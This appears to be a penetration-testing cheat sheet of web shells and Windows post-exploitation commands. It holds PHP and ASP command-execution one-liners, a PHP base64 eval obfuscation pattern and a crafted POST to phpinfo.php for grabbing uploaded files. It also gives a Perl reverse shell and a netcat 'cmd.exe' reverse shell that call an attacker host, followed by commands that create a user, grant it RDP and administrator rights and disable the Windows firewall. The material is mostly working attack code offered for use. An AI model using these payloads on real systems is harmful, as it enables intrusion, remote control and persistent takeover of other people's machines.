Web Shells

 

PHP

One liner.

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Retrieve uploaded files from PHPInfo()

POST /phpinfo.php HTTP/1.0

Content-Type: multipart/form-data; boundary=--------------------------- 7db268605ae

Content-Length: 196

-----------------------------7db268605ae

Content-Disposition: form-data; name="dummyname"; filename="test.txt" Content-Type: text/plain Security Test

-----------------------------7db268605ae

WINDOWS | reverse shells

Windows is a bit of a different animal because it doesn’t come with the same beautiful command line tools that spoil us in Linux. If we have the need for a reverse shell, then our entry-point was most likely some kind of file upload capability or rce, often through a web-application.

Firstly, if you happen to find a windows system with Perl (unlikely), give this a whirl (source):

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"$attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Otherwise, we have a couple of options:

  • Attempt to download nc.exe, and then run something along the lines of “nc.exe -e cmd.exe attackerip 1234”.
  • If we are dealing with an IIS server, create our own .asp or .aspx reverse shell payload with msfvenom, and then execute it.
  • Powershell injection

Here’s some other useful commands on windows. If the machine you’re facing has RDP enabled (port 3389), you can often create your own user and add it to the “Remote Desktop Users” group, then just log in via remote desktop.

Add a user on windows:

net user $username $password /add

Add a user to the “Remote Desktop Users” group:

net localgroup "Remote Desktop Users" $username /add

Make a user an administrator:

net localgroup administrators $username /add

Disable Windows firewall on newer versions:

NetSh Advfirewall set allprofiles state off

Disable windows firewall on older windows:

netsh firewall set opmode disable

 

ASP One Liner

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

PHP Obfuscation

eval(base64_decode("<base64 encoded>"));